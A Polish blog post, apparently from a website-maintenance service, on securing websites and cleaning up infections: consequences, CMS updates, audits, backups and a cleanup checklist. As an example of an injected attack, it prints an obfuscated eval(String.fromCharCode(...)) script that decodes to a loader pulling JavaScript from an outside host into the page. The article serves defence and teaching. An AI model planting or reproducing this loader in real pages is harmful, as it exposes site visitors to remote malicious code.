Bezpieczeństwo stron internetowych

Bezpieczeństwo stron internetowych

Bezpieczeństwo stron internetowych jest równie ważna jak bezpieczeństwo innych systemów teleinformatycznych, żeby nie napisać, że ważniejsze. Po pierwsze narażamy w głównej mierze swoich czytelników, klientów, którzy mogą stracić dużo więcej. Po drugie, poprzez działanie niepożądanego oprogramowania (kodu) tracimy tychże internautów, łącznie z możliwością zbanowania przez różne systemy antywirusowe.

<script type=”text/javascript“>eval(String.fromCharCode(118, 97, 114, 32, 115, 99, 114, 105, 112, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 10, 115, 99, 114, 105, 112, 116, 46, 111, 110, 108, 111, 97, 100, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 125, 59, 10, 115, 99, 114, 105, 112, 116, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 121, 111, 117, 114, 115, 101, 114, 118, 105, 99, 101, 46, 108, 105, 118, 101, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 45, 109, 105, 110, 105, 46, 106, 115, 34, 59, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 99, 114, 105, 112, 116, 41, 59));</script>

Odróżniamy różne ataki na strony internetowe – od zwykłego skryptu zaszytego w kodzie strony (przykład powyżej), bądź w bazie danych, który ma za zadanie przekierować nas na inną stronę, poprzez skrypty wyłudzające dane czy instalujące złośliwe oprogramowanie.

Skutki zawirusowanej strony

Jak już wcześniej pisałem, skutki działań hackerów mogą być następujące:

  • utrata zaufania do naszej strony przez internautów
  • zablokowanie strony w wyszukiwarkach oraz systemach antywirusowych
  • wyłudzanie danych od nieświadomych czytelników

Jak się bronić?

Żaden system CMS (WordPress, Joomla, PHP-Fushion itp.) nie są w 100% bezpieczne, żadna baza danych nie jest odporna na ataki. W związku z tym, nie ma też 100% sposobu na obronę przed tego typu działaniami. Można jednak ograniczyć możliwość ataku poprzez odpowiednio skonfigurowany serwer www, aktualny system CMS czy aktualne wtyczki (moduły) systemu zarządzania treścią (CMS). Dlatego ważna jest odpowiednia opieka nad serwisem oraz monitorowanie pojawiających się komunikatów dotyczących bezpieczeństwa danego systemu czy skryptu.

Audyt bezpieczeństwa

Ważny jest też audyt bezpieczeństwa zarówno strony jak i całego środowiska serwerowego. O ile w przypadku wykupionych serwerów dedykowanych czy VPS jest to możliwe do samodzielnego wykonania, tak w przypadku hostingu współdzielonego może dojść do sytuacji, że jedna zainfekowana strona spowoduje modyfikację pozostałych znajdujących się na danym serwerze (w danym środowisku serwerowym). Dlatego tak ważne jest monitorowanie logów, a w przypadku stwierdzenia nieprawidłowości czy sytuacji wskazujących na nienaturalny ruch czy działania, należy powiadomić firmę hostingową (administratora serwera).

Kopia zapasowa

Często spotykamy się z pytaniem czy po ataku na stronę wystarczy wykorzystać backup (kopię zapasową) do przywrócenia poprzedniej wersji strony. Odpowiedź brzmi i tak i nie. NIE! Gdyż osoba pracująca nad stroną nie będzie wiedziała jaki atak został przeprowadzony i jakie kroki należy podjąć w celu uniknięcia w przyszłości podobnych sytuacji, a bynajmniej zminimalizowania ryzyka. TAK! Gdyż zbyt długie zwlekanie może narazić na blokadę strony w systemach typu safe browser.

Przykład strony, która została zablokowana przez system AV.

Dlatego tak ważny jest w takich sytuacjach czas. Po stwierdzeniu nieprawidłowości należy bezzwłocznie poinformować administratora strony, bądź opiekuna i zacząć działać.

Większość infekcji usuwamy w ciągu 12-24h, w skład działań wchodzą:

  1. identyfikacja zagrożenia z jednoczesnym sprawdzeniem czy strona już nie została zablokowana
  2. w szczególnych przypadkach uruchomienie serwisu w trybie konserwacji (maintenance) by nie powodować zagrożenia dla użytkowników, bądź rozprzestrzeniania się złośliwego kodu po serwisie
  3. sprawdzenie zarażonych plików wraz z usunięciem szkodliwego kodu
  4. sprawdzenie bazy danych na obecność malware i ew. usunięcie zbędnych wpisów
  5. sprawdzenie aktualności serwisu oraz wtyczek – w przypadku zastosowania w systemu CMS
  6. sprawdzenie konfiguracji serwera oraz działania mające na celu zabezpieczenie serwera
  7. jeżeli strona została uśpiona – wprowadzona w tryb konserwacji – przywrócenie jej do działania
  8. jeżeli blokada nie została jeszcze nałożona – ostatnim krokiem jest kilkudniowy monitoring strony oraz audyt pod względem dalszej podatności na ataki

W przypadku nałożenia na stronę blokad systemów AV oraz wyszukiwarek czy przeglądarek czas na zdjęcie obostrzeń wydłuży się w zależności od procedur i polityki danego systemu safe browser.

Dodaj komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *